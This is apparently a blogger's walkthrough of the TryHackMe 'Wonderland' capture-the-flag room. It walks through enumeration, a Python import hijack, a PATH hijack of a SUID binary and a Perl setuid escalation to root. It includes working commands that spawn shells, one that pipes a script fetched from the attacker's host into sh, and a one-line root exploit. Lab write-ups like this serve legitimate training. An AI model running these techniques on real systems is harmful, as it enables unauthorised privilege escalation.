Writeup — Wonderland

While browsing TryHackMe, I came across a particularly interesting room: Wonderland. This room is of medium difficulty and I will detail below the complete steps to get to the end of this room

I will detail this room in several major steps:

• Enumeration
• 1st privilege escalation
• 2nd privilege escalation
• 3rd privilege escalation

Enumeration

For this first step, as usual, I start by doing an nmap on the target machine with level 2 verbosity, TCP/SYN and version search:

nmap -vv -sS -sV RHOST

nmap output

Nothing really interesting except an SSH server and a web server. Now let’s browse the site to see what we can get out of it.

Here again, nothing interesting, except a text and an image. Let’s try to retrieve hidden folders with gobuster

gobuster dir --wordlist=/usr/share/wordlists/dirb/common.txt --url=RHOST

gobuster output

Something interesting: A /r folder. Let’s go there and see what we can find inside:

/r/index.html

We can guess that another folder or file is hiding from this URL. Let’s try again with gobuster

Indeed, another folder was hiding from the /r. If we run gobuster on all these folders, we end up on the /r/a/b/b/i/t. Let’s take a closer look at the source code: An SSH log is hidden inside!

Source code from /r/a/b/b/i/t

Now that we have an SSH log, let’s connect to the server and list the available users

all users

Finally, let’s list the files we have in our current folder

Interesting, we have a root.txt file (owned by root and with no permissions, so we can’t read it) and a python file. Now that we have done all the research work, let’s try to escalate the privileges to administrator rights. Let’s try to get the keys to the kingdom.

First escalation

Above, we have discovered a python file. Let’s take a closer look at what this file contains. Nothing crazy since it is a text with 10 random lines printed using random, imported at the beginning of the file

import random

print ten random lines

An import you said? Does that mean we can do an import override of random function? And yes you are right but what is the use if we can only run it as Alice? Let’s look at the Sudo rights we have:

Wow! We can execute python file as rabbit! Let’s try to run a shell from a new random.py file in the same folder and execute python file as rabbit with the following line:

import pty; pty.spawn("/bin/bash")

Okay, now we have successfully made our first privilege escalation. Let’s move on

Second escalation

Now that we have access to the user rabbit, let’s take a look at what he has in his current folder.

Its current folder contains an interesting file: teaParty. This file is a file that belongs to root, and contains a Suid bit at runtime for the owner of the file. Let’s deep into this file and examining it. I send this file on my own machine to have access to all the tools I would need. Next, I execute strings on the file

As we can see, teaParty execute date without absolute path. This leaves us the possibility to use our own custom date and tell our $PATH to use ours first. Let’s create a date, put a shell spawner inside it and tell our $PATH to use this date file first.

Now, it’s time to make date executable, execute our teaParty and…

We successfully made our second privilege escalation and we can now retrieve hatter password in their home directory!

Third escalation

Now it’s time to try to get the keys of the kingdom. Let’s enumerate the system using linpeas. Since the target machine don’t have access to internet, let’s create a python HTTP server on our machine and retrieve the file from our target machine while remaining on the local network

curl OUR_IP:OUR_PORT/linpeas.sh | sh | tee output

By digging a little, we can realize that perl is able to execute anything with any UID

So let’s run a new shell with the UID of root

/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

Let’s go, the keys to the kingdom! We can get user.txt in /root and root.txt in /home/alice